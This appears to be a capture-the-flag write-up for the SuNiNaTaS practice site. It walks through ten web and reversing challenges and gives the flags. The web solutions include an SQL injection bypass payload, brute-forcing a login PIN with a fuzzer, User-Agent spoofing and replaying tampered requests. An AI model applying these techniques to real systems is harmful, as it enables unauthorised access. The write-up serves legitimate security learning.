Hello Navi

challenges

Game 01

Code Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<%
str = Request("str")

    If not str = "" Then
        result = Replace(str,"a","aad")
        result = Replace(result,"i","in")
        result1 = Mid(result,2,2)
        result2 = Mid(result,4,6)
        result = result1 & result2
        Response.write result
        If result = "admin" Then
            pw = "????????"
        End if
    End if
%>

1. Replace(str, "a", "aad"): Replaces every ‘a’ with ‘aad’.
2. Replace(result, "i", "in"): Replaces every ‘i’ with ‘in’.
3. Mid(result, 2, 2): Extracts 2 characters starting from the 2nd index.
4. Mid(result, 4, 6): Extracts up to 6 characters starting from the 4th index.
5. The goal is to make the final concatenated result equal to admin.

If we input ami: - a -> aad - i -> in - Intermediate result: aadmin - result1 = Mid("aadmin", 2, 2) = ad - result2 = Mid("aadmin", 4, 6) = min - result = ad + min = admin

challenges

Game 02

Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<script>
  function chk_form() {
    var id = document.web02.id.value;
    var pw = document.web02.pw.value;
    if (id == pw) {
      alert("You can't join! Try again");
      document.web02.id.focus();
      document.web02.id.value = "";
      document.web02.pw.value = "";
    } else {
      document.web02.submit();
    }
  }
</script>
<!-- Hint : Join / id = pw -->
<!-- M@de by 2theT0P -->

The script prevents the form from being submitted if the id is equal to the pw. However, the hint explicitly states that for the Join challenge, we need id = pw.

Bypass

Intercept the request with a proxy (like Burp Suite or Zaproxy) or use the browser’s Network tab to replay a modified request.

challenges

Game 03

1

http://suninatas.com/board/notice/write

challenges

Game 04

Hint: Make your point to 50 & ‘SuNiNaTaS’

Tool: ZAProxy

Initial Request

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0

Solution Steps

1. Set fuzz location with numbers from 0 → 23
2. Click plus in browser with the same cookie
3. Receive alert: “I like the SuNiNaTaS browser!”
4. Change User-Agent to include “SuNiNaTaS”:

1
2
3
4

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

total=25

5. Fuzz again until points reach 50 (avoid overflow)

Response

1
2
3
4

<td class="table_top">
  <font size="2"><b>Auth key</b></font>
</td>
<td class="table_top">***********************</td>

challenges

Game 05

Concepts: JS Packer, JSObfuscator

Challenge Code

1
2
3
4
5
6
7
8
9
10
11
12

<input name="password" value="" style="width:180" />

<script>
  eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('g l=m o('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');p q(n){g h='';g j=r;s(g i=t;i>0;){i-=4;g k=(n>>i)&u;v(!j||k!=0){j=w;h+=l[k]}}x(h==''?'0':h)}',34,34,'||||||||||||||||var|result||start|digit|digitArray|new||Array|function|PASS|true|for|32|0xf|if|false|return'.split('|'),0,{}))
</script>

<script>
  function init() {
    document.frm.password.value = "";
    document.frm.password.focus();
  }
</script>

Deobfuscated Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

var digitArray = new Array(
  "0",
  "1",
  "2",
  "3",
  "4",
  "5",
  "6",
  "7",
  "8",
  "9",
  "a",
  "b",
  "c",
  "d",
  "e",
  "f",
);

function PASS(n) {
  var result = "";
  var start = true;
  for (var i = 32; i > 0; ) {
    i -= 4;
    var digit = (n >> i) & 0xf;
    if (!start || digit != 0) {
      start = false;
      result += digitArray[digit];
    }
  }
  return result == "" ? "0" : result;
}

Solution

Convert the hint using the PASS() function:

1

PASS(12342046413275659);

challenges

Game 07

ublock(browser addon) btw

refresh and click the botton

1

<input type="submit" value="YES" />

challenges

Game 06

Vulnerability: SQL Injection

Attack Vector

1
2

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

1
2

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check by making the condition always true.

Success Response

1
2
3
4

Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

1

<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>

challenges

Game 08

Vulnerability: Brute Force

Hint: Login as ‘admin’ with password in range 0 ~ 9999

Tool: ZAProxy

Attack

Use fuzzing to brute force the password parameter from 0 to 9999.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST http://suninatas.com/challenge/web08/web08.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web08/web08.asp
Cookie: ASPSESSIONIDQSBTDCST=FNDPAPJCJDFBJAAENDCKDGDK
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=admin&pw=$$

challenges

Game 09

Challenge: Reverse engineering a Windows executable

Step 1: Extract Archive

1

7z x SuNiNaTaS.zip

Step 2: Identify File

1

file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 3: Analyze with IDA

Run the executable in a virtual environment (Windows 10, VirtualBox).

The program displays an input box with two buttons.

Use IDA Pro and press Shift+F12 to view strings. Look for the “Congratulation!” message, then double-click to find cross-references.

Step 4: Find Password

From IDA disassembly:

1
2
3
4
5
6
7
8
9
10

CODE:00450388 ; ---------------------------------------------------------------------------
CODE:00450389                 align 4
CODE:0045038C _str_913465     _strings <0FFFFFFFFh, 6, '913465'>
CODE:0045038C                                         ; DATA XREF: _TForm1_Button1Click+1B↑o
CODE:0045039B                 align 4
CODE:0045039C ; const CHAR aSuninatas[]
CODE:0045039C aSuninatas      db 'SuNiNaTaS',0        ; DATA XREF: _TForm1_Button1Click+45↑o
CODE:004503A6                 align 4
CODE:004503A8 ; const CHAR aCongratulation[]
CODE:004503A8 aCongratulation db 'Congratulation!',0  ; DATA XREF: _TForm1_Button1Click+4A↑o

challenges

Game 10

Challenge: Reverse engineering a .NET Windows executable

Step 1: Extract and Identify

1
2

7z x reversing.zip
file reversing.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections

Step 2: Hex Analysis

From hex view, strings are readable in Unicode format:

1

2theT@P, Authkey: Did U use the Peid?, SuNiNaTaS, Try again!, explorer, http://suninatas.com, textBox1, button1, OK, label2, Made by 2theT0P, button2, QUIT, Form1, WindowsFormsApplication1, Properties, Resources

The program is based on WinForms.

Step 3: Decompile with dnSpyEx

Use dnSpyEx (run in Windows) and drag the file to decompile.

Decompiled Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

// WindowsFormsApplication1.Form1
// Token: 0x06000003 RID: 3 RVA: 0x00002068 File Offset: 0x00000268
private void button1_Click(object sender, EventArgs e)
{
    string text = "2theT@P";
    string text2 = "Authkey : Did U use the Peid?";
    if (this.textBox1.Text == text)
    {
        MessageBox.Show(text2, "SuNiNaTaS");
        this.textBox1.Text = "";
        return;
    }
    MessageBox.Show("Try again!", "SuNiNaTaS");
    this.textBox1.Text = "";
}